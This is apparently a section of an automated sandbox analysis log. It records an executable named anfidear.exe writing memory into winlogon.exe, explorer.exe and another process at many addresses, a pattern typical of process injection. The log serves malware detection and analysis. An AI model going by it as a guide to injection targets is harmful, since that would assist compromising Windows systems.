Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10250000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10260000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10270000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10280000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10290000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 102A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 102B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 102C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 103D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 103E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10400000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10410000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10420000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10430000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10440000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10450000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10460000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10470000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10480000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10490000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 104F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10500000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10510000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10520000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10530000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10540000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10550000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10560000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10570000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10580000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10590000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 105F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10600000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10610000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10640000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10650000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10660000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10670000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10680000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10690000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 106F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10700000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10710000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10720000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10620000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10630000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10730000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10740000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10750000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10760000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10770000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10780000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10790000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 107F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10800000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10810000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10820000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10830000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10840000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10850000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10860000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10870000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10880000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10890000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 108F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10900000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10910000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10920000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10930000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10940000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10950000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10960000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10970000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10980000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10990000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 109F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10A90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10AF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10B90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10BF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10C80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10CB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10CC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10CD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10CE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10CF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10D00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10D10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F520000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2A40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2A50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2CB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2CC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 85B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 76F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 85C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 85E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 85F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: CD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ADE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A770000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 81C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 81D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 81F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8200000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8210000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 84C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 84D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 84E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 84F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8500000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: CC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8510000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8520000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8530000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 85D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A8C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9450000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9460000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9470000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2960000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2970000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 29A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2980000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2990000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 29B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 29C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 29D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 7F70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 90C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 90D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9130000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 90E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 90F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9100000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9110000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9120000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9350000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9360000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9370000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9380000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9390000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9270000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 93C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 94A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9480000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 9490000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 94B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 94C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A8D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A8E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A8F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A900000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A910000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A920000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A930000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ADD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B1B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B1C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B1D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DED0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DEE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2590000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A9D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: CE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2550000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2560000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 2580000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A9E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: A9F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AA90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AAF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB20000Jump to behavior
